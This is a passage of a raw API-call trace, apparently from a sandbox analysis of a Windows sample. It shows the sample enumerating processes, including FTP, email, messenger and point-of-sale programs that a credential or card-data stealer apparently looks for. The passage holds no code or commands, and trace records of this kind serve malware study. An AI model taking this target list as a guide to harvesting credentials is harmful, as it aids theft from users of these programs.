cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.970] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.972] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.012] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.014] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.016] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.019] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.021] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.023] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.025] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.028] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.030] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.032] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.035] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.037] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.040] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.042] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.044] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.050] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.052] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.055] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0187.057] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0187.059] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.062] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.064] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.066] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.068] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0187.071] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.073] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.075] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.077] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.079] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.081] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0187.086] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0187.088] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0187.091] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0187.093] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0187.095] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0187.097] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0187.100] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0187.102] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0187.105] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0187.107] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0187.109] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0187.111] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0187.114] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0187.115] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0187.118] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0187.120] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0187.125] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0187.127] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0187.129] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0187.132] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0187.135] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0187.138] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0187.140] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0187.143] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0187.145] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0187.149] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0187.152] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0187.156] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0187.161] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0187.165] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0187.173] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0187.176] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0187.178] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0187.181] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0187.184] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0187.186] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0187.189] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0187.191] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0187.194] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0187.197] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0187.199] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0187.202] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0187.208] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0187.215] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0187.218] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0187.220] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0187.222] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0187.225] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0187.227] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0187.230] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0187.232] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0187.234] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0187.237] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, 